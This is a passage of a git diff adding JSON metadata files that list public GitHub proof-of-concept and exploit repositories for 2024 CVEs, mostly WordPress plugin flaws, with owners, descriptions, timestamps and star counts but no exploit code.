"https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-10245", + "description": "Relais 2FA <= 1.0 - Authentication Bypass", + "fork": false, + "created_at": "2024-11-17T16:34:28Z", + "updated_at": "2024-11-17T16:35:09Z", + "pushed_at": "2024-11-17T16:35:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10354.json b/2024/CVE-2024-10354.json new file mode 100644 index 0000000000..46cb5d6152 --- /dev/null +++ b/2024/CVE-2024-10354.json @@ -0,0 +1,33 @@ +[ + { + "id": 877188085, + "name": "CVE-2024-10354", + "full_name": "K1nakoo\/CVE-2024-10354", + "owner": { + "login": "K1nakoo", + "id": 105909793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105909793?v=4", + "html_url": "https:\/\/github.com\/K1nakoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K1nakoo\/CVE-2024-10354", + "description": null, + "fork": false, + "created_at": "2024-10-23T08:37:18Z", + "updated_at": "2024-10-26T13:50:18Z", + "pushed_at": "2024-10-23T08:37:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10355.json b/2024/CVE-2024-10355.json new file mode 100644 index 0000000000..0ca04ad996 --- /dev/null +++ b/2024/CVE-2024-10355.json @@ -0,0 +1,33 @@ +[ + { + "id": 877198778, + "name": "CVE-2024-10355", + "full_name": "K1nakoo\/CVE-2024-10355", + "owner": { + "login": "K1nakoo", + "id": 105909793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105909793?v=4", + "html_url": "https:\/\/github.com\/K1nakoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K1nakoo\/CVE-2024-10355", + "description": null, + "fork": false, + "created_at": "2024-10-23T08:59:51Z", + "updated_at": "2024-10-26T13:50:29Z", + "pushed_at": "2024-10-23T09:00:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10400.json b/2024/CVE-2024-10400.json new file mode 100644 index 0000000000..bb66f1b7ee --- /dev/null +++ b/2024/CVE-2024-10400.json @@ -0,0 +1,36 @@ +[ + { + "id": 910972988, + "name": "CVE-2024-10400", + "full_name": "k0ns0l\/CVE-2024-10400", + "owner": { + "login": "k0ns0l", + "id": 55334728, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55334728?v=4", + "html_url": "https:\/\/github.com\/k0ns0l", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k0ns0l\/CVE-2024-10400", + "description": "[POC][Exploit] CVE-2024-10400", + "fork": false, + "created_at": "2025-01-02T00:12:53Z", + "updated_at": "2025-01-07T10:09:30Z", + "pushed_at": "2025-01-02T00:31:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "tutor-lms", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10410.json b/2024/CVE-2024-10410.json new file mode 100644 index 0000000000..7d224a899f --- /dev/null +++ b/2024/CVE-2024-10410.json @@ -0,0 +1,33 @@ +[ + { + "id": 878506568, + "name": "CVE-2024-10410", + "full_name": "K1nakoo\/CVE-2024-10410", + "owner": { + "login": "K1nakoo", + "id": 105909793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105909793?v=4", + "html_url": "https:\/\/github.com\/K1nakoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K1nakoo\/CVE-2024-10410", + "description": null, + "fork": false, + "created_at": "2024-10-25T14:15:56Z", + "updated_at": "2024-10-26T13:44:39Z", + "pushed_at": "2024-10-25T14:16:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10448.json b/2024/CVE-2024-10448.json new file mode 100644 index 0000000000..1f8677fd5c --- /dev/null +++ b/2024/CVE-2024-10448.json @@ -0,0 +1,33 @@ +[ + { + "id": 879406614, + "name": "CVE-2024-10448", + "full_name": "bevennyamande\/CVE-2024-10448", + "owner": { + "login": "bevennyamande", + "id": 10162710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10162710?v=4", + "html_url": "https:\/\/github.com\/bevennyamande", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bevennyamande\/CVE-2024-10448", + "description": "Blood bank CSRF Attack POC", + "fork": false, + "created_at": "2024-10-27T20:18:35Z", + "updated_at": "2024-10-28T18:48:37Z", + "pushed_at": "2024-10-27T22:12:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10449.json b/2024/CVE-2024-10449.json new file mode 100644 index 0000000000..208d6f814a --- /dev/null +++ b/2024/CVE-2024-10449.json @@ -0,0 +1,33 @@ +[ + { + "id": 883977165, + "name": "CVE-2024-10449-patch", + "full_name": "g-u-i-d\/CVE-2024-10449-patch", + "owner": { + "login": "g-u-i-d", + "id": 3040892, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3040892?v=4", + "html_url": "https:\/\/github.com\/g-u-i-d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g-u-i-d\/CVE-2024-10449-patch", + "description": null, + "fork": false, + "created_at": "2024-11-05T23:06:49Z", + "updated_at": "2024-11-05T23:15:23Z", + "pushed_at": "2024-11-05T23:15:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10470.json b/2024/CVE-2024-10470.json new file mode 100644 index 0000000000..fb2b0cbcd5 --- /dev/null +++ b/2024/CVE-2024-10470.json @@ -0,0 +1,64 @@ +[ + { + "id": 885543843, + "name": "CVE-2024-10470", + "full_name": "RandomRobbieBF\/CVE-2024-10470", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-10470", + "description": "WPLMS Learning Management System for WordPress <= 4.962 – Unauthenticated Arbitrary File Read and Deletion", + "fork": false, + "created_at": "2024-11-08T19:47:34Z", + "updated_at": "2024-11-08T19:50:12Z", + "pushed_at": "2024-11-08T19:50:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 896308178, + "name": "CVE-2024-10470", + "full_name": "0xshoriful\/CVE-2024-10470", + "owner": { + "login": "0xshoriful", + "id": 167082207, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167082207?v=4", + "html_url": "https:\/\/github.com\/0xshoriful", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xshoriful\/CVE-2024-10470", + "description": null, + "fork": false, + "created_at": "2024-11-30T02:45:52Z", + "updated_at": "2024-11-30T02:46:38Z", + "pushed_at": "2024-11-30T02:46:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10508.json b/2024/CVE-2024-10508.json new file mode 100644 index 0000000000..da79c8bab5 --- /dev/null +++ b/2024/CVE-2024-10508.json @@ -0,0 +1,76 @@ +[ + { + "id": 890697251, + "name": "CVE-2024-10508", + "full_name": "ubaii\/CVE-2024-10508", + "owner": { + "login": "ubaii", + "id": 31325580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31325580?v=4", + "html_url": "https:\/\/github.com\/ubaii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ubaii\/CVE-2024-10508", + "description": null, + "fork": false, + "created_at": "2024-11-19T02:47:59Z", + "updated_at": "2024-11-19T02:50:12Z", + "pushed_at": "2024-11-19T02:50:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891857006, + "name": "CVE-2024-10508", + "full_name": "Jenderal92\/CVE-2024-10508", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/CVE-2024-10508", + "description": "This tool scans WordPress sites for vulnerabilities in the \"RegistrationMagic\" plugin (CVE-2024-10508). It checks for the presence of a specific version (`6.0.2.6`) and marks the site as vulnerable if found. The results are saved in a file (`vuln.txt`) for further analysis.", + "fork": false, + "created_at": "2024-11-21T04:32:19Z", + "updated_at": "2024-12-07T21:27:48Z", + "pushed_at": "2024-11-21T04:39:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-10508", + "cve-scanner", + "plugin-security", + "python", + "registrationmagic", + "security-tools", + "vulnerability", + "vulnerability-detection", + "vulnerability-scanner", + "wordpress", + "wordpress-security" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10511.json b/2024/CVE-2024-10511.json new file mode 100644 index 0000000000..b16396cd68 --- /dev/null +++ b/2024/CVE-2024-10511.json @@ -0,0 +1,33 @@ +[ + { + "id": 908003038, + "name": "CVE-2024-10511", + "full_name": "revengsmK\/CVE-2024-10511", + "owner": { + "login": "revengsmK", + "id": 95986479, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95986479?v=4", + "html_url": "https:\/\/github.com\/revengsmK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/revengsmK\/CVE-2024-10511", + "description": "Schneider Electric PowerChute Serial Shutdown vulnerability.", + "fork": false, + "created_at": "2024-12-24T20:50:20Z", + "updated_at": "2024-12-24T20:59:13Z", + "pushed_at": "2024-12-24T20:54:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10516.json b/2024/CVE-2024-10516.json new file mode 100644 index 0000000000..28ec9500f1 --- /dev/null +++ b/2024/CVE-2024-10516.json @@ -0,0 +1,33 @@ +[ + { + "id": 899490028, + "name": "CVE-2024-10516", + "full_name": "RandomRobbieBF\/CVE-2024-10516", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-10516", + "description": "Swift Performance Lite <= 2.3.7.1 - Unauthenticated Local PHP File Inclusion via 'ajaxify'", + "fork": false, + "created_at": "2024-12-06T11:24:19Z", + "updated_at": "2024-12-06T15:42:17Z", + "pushed_at": "2024-12-06T11:25:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10542.json b/2024/CVE-2024-10542.json new file mode 100644 index 0000000000..d997fd0d30 --- /dev/null +++ b/2024/CVE-2024-10542.json @@ -0,0 +1,33 @@ +[ + { + "id": 894757253, + "name": "CVE-2024-10542", + "full_name": "ubaii\/CVE-2024-10542", + "owner": { + "login": "ubaii", + "id": 31325580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31325580?v=4", + "html_url": "https:\/\/github.com\/ubaii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ubaii\/CVE-2024-10542", + "description": "WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 is vulnerable to Unauthenticated Arbitrary Plugin Installation", + "fork": false, + "created_at": "2024-11-26T23:47:17Z", + "updated_at": "2024-11-28T11:51:19Z", + "pushed_at": "2024-11-26T23:49:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10557.json b/2024/CVE-2024-10557.json new file mode 100644 index 0000000000..8d65df2645 --- /dev/null +++ b/2024/CVE-2024-10557.json @@ -0,0 +1,33 @@ +[ + { + "id": 879936174, + "name": "CVE-2024-10557", + "full_name": "bevennyamande\/CVE-2024-10557", + "owner": { + "login": "bevennyamande", + "id": 10162710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10162710?v=4", + "html_url": "https:\/\/github.com\/bevennyamande", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bevennyamande\/CVE-2024-10557", + "description": "A CSRF POC for Updating the Profile of a Hospital leading to Account Takeover", + "fork": false, + "created_at": "2024-10-28T20:14:45Z", + "updated_at": "2024-10-30T21:38:18Z", + "pushed_at": "2024-10-28T20:40:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10586.json b/2024/CVE-2024-10586.json new file mode 100644 index 0000000000..1b7ed2d15c --- /dev/null +++ b/2024/CVE-2024-10586.json @@ -0,0 +1,33 @@ +[ + { + "id": 886165127, + "name": "CVE-2024-10586", + "full_name": "RandomRobbieBF\/CVE-2024-10586", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-10586", + "description": "Debug Tool <= 2.2 - Unauthenticated Arbitrary File Creation", + "fork": false, + "created_at": "2024-11-10T11:30:05Z", + "updated_at": "2024-11-15T13:24:00Z", + "pushed_at": "2024-11-10T11:30:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10592.json b/2024/CVE-2024-10592.json new file mode 100644 index 0000000000..dbfffaebc4 --- /dev/null +++ b/2024/CVE-2024-10592.json @@ -0,0 +1,33 @@ +[ + { + "id": 890584132, + "name": "CVE-2024-10592", + "full_name": "windz3r0day\/CVE-2024-10592", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-10592", + "description": "CVE-2024-10592 poc exploit ", + "fork": false, + "created_at": "2024-11-18T20:34:38Z", + "updated_at": "2024-11-18T20:51:34Z", + "pushed_at": "2024-11-18T20:39:29Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10605.json b/2024/CVE-2024-10605.json new file mode 100644 index 0000000000..c9577a23ca --- /dev/null +++ b/2024/CVE-2024-10605.json @@ -0,0 +1,33 @@ +[ + { + "id": 881099968, + "name": "CVE-2024-10605", + "full_name": "bevennyamande\/CVE-2024-10605", + "owner": { + "login": "bevennyamande", + "id": 10162710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10162710?v=4", + "html_url": "https:\/\/github.com\/bevennyamande", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bevennyamande\/CVE-2024-10605", + "description": null, + "fork": false, + "created_at": "2024-10-30T22:56:24Z", + "updated_at": "2024-11-03T23:41:01Z", + "pushed_at": "2024-10-30T23:06:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10629.json b/2024/CVE-2024-10629.json new file mode 100644 index 0000000000..ea1ffa96c8 --- /dev/null +++ b/2024/CVE-2024-10629.json @@ -0,0 +1,33 @@ +[ + { + "id": 887379678, + "name": "CVE-2024-10629", + "full_name": "RandomRobbieBF\/CVE-2024-10629", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-10629", + "description": "GPX Viewer <= 2.2.8 - Authenticated (Subscriber+) Arbitrary File Creation", + "fork": false, + "created_at": "2024-11-12T16:36:20Z", + "updated_at": "2024-11-12T16:38:23Z", + "pushed_at": "2024-11-12T16:38:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10654.json b/2024/CVE-2024-10654.json new file mode 100644 index 0000000000..593ff98f9e --- /dev/null +++ b/2024/CVE-2024-10654.json @@ -0,0 +1,33 @@ +[ + { + "id": 881183952, + "name": "IoT_vuln", + "full_name": "c0nyy\/IoT_vuln", + "owner": { + "login": "c0nyy", + "id": 146458543, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146458543?v=4", + "html_url": "https:\/\/github.com\/c0nyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c0nyy\/IoT_vuln", + "description": "POC CVE-2024-10654", + "fork": false, + "created_at": "2024-10-31T03:48:22Z", + "updated_at": "2024-11-01T14:25:39Z", + "pushed_at": "2024-11-01T14:18:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1071.json b/2024/CVE-2024-1071.json new file mode 100644 index 0000000000..6d9314753e --- /dev/null +++ b/2024/CVE-2024-1071.json @@ -0,0 +1,219 @@ +[ + { + "id": 764046735, + "name": "CVE-2024-1071", + "full_name": "gbrsh\/CVE-2024-1071", + "owner": { + "login": "gbrsh", + "id": 36970331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4", + "html_url": "https:\/\/github.com\/gbrsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gbrsh\/CVE-2024-1071", + "description": "Ultimate Member Unauthorized Database Access \/ SQLi", + "fork": false, + "created_at": "2024-02-27T11:41:53Z", + "updated_at": "2024-11-20T16:30:41Z", + "pushed_at": "2024-02-27T11:45:50Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 767118935, + "name": "CVE-2024-1071-Docker", + "full_name": "Trackflaw\/CVE-2024-1071-Docker", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2024-1071-Docker", + "description": "CVE-2024-1071 with Docker", + "fork": false, + "created_at": "2024-03-04T18:29:17Z", + "updated_at": "2025-01-05T11:01:25Z", + "pushed_at": "2024-03-05T18:35:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773939193, + "name": "CVE-2024-1071", + "full_name": "Matrexdz\/CVE-2024-1071", + "owner": { + "login": "Matrexdz", + "id": 161771152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161771152?v=4", + "html_url": "https:\/\/github.com\/Matrexdz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Matrexdz\/CVE-2024-1071", + "description": "CVE-2024-1071", + "fork": false, + "created_at": "2024-03-18T16:58:46Z", + "updated_at": "2024-03-18T17:12:07Z", + "pushed_at": "2024-03-18T17:04:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773943544, + "name": "CVE-2024-1071-Docker", + "full_name": "Matrexdz\/CVE-2024-1071-Docker", + "owner": { + "login": "Matrexdz", + "id": 161771152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161771152?v=4", + "html_url": "https:\/\/github.com\/Matrexdz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Matrexdz\/CVE-2024-1071-Docker", + "description": null, + "fork": false, + "created_at": "2024-03-18T17:07:27Z", + "updated_at": "2024-03-18T17:12:06Z", + "pushed_at": "2024-03-18T17:09:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 849694443, + "name": "CVE-2024-1071-SQL-Injection", + "full_name": "gh-ost00\/CVE-2024-1071-SQL-Injection", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-1071-SQL-Injection", + "description": "Proof of concept : CVE-2024-1071: WordPress Vulnerability Exploited", + "fork": false, + "created_at": "2024-08-30T04:23:04Z", + "updated_at": "2024-12-17T20:19:30Z", + "pushed_at": "2024-08-30T05:10:51Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 857700493, + "name": "WordPress-Exploit-CVE-2024-1071", + "full_name": "Dogu589\/WordPress-Exploit-CVE-2024-1071", + "owner": { + "login": "Dogu589", + "id": 73641405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73641405?v=4", + "html_url": "https:\/\/github.com\/Dogu589", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dogu589\/WordPress-Exploit-CVE-2024-1071", + "description": null, + "fork": false, + "created_at": "2024-09-15T11:28:47Z", + "updated_at": "2024-10-03T20:08:55Z", + "pushed_at": "2024-09-15T12:28:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 881948753, + "name": "CVE-2024-1071-PoC-Script", + "full_name": "Spid3heX\/CVE-2024-1071-PoC-Script", + "owner": { + "login": "Spid3heX", + "id": 183846301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/183846301?v=4", + "html_url": "https:\/\/github.com\/Spid3heX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Spid3heX\/CVE-2024-1071-PoC-Script", + "description": "wp\/ultimate-member - SQL Injection Vulnerability Exploit Script.", + "fork": false, + "created_at": "2024-11-01T14:57:34Z", + "updated_at": "2024-11-03T03:53:40Z", + "pushed_at": "2024-11-01T18:14:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10728.json b/2024/CVE-2024-10728.json new file mode 100644 index 0000000000..90ac245fe5 --- /dev/null +++ b/2024/CVE-2024-10728.json @@ -0,0 +1,33 @@ +[ + { + "id": 889424362, + "name": "CVE-2024-10728", + "full_name": "RandomRobbieBF\/CVE-2024-10728", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-10728", + "description": "PostX <= 4.1.16 - Missing Authorization to Arbitrary Plugin Installation\/Activation", + "fork": false, + "created_at": "2024-11-16T10:51:56Z", + "updated_at": "2024-11-16T11:00:46Z", + "pushed_at": "2024-11-16T11:00:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10793.json b/2024/CVE-2024-10793.json new file mode 100644 index 0000000000..bc08d59321 --- /dev/null +++ b/2024/CVE-2024-10793.json @@ -0,0 +1,64 @@ +[ + { + "id": 889993152, + "name": "CVE-2024-10793", + "full_name": "windz3r0day\/CVE-2024-10793", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-10793", + "description": "CVE-2024-10793 poc exploit", + "fork": false, + "created_at": "2024-11-17T18:44:53Z", + "updated_at": "2025-01-03T14:51:08Z", + "pushed_at": "2024-11-17T19:51:53Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 905828907, + "name": "CVE-2024-10793", + "full_name": "MAHajian\/CVE-2024-10793", + "owner": { + "login": "MAHajian", + "id": 139576061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139576061?v=4", + "html_url": "https:\/\/github.com\/MAHajian", + "user_view_type": "public" + }, + "html_url": 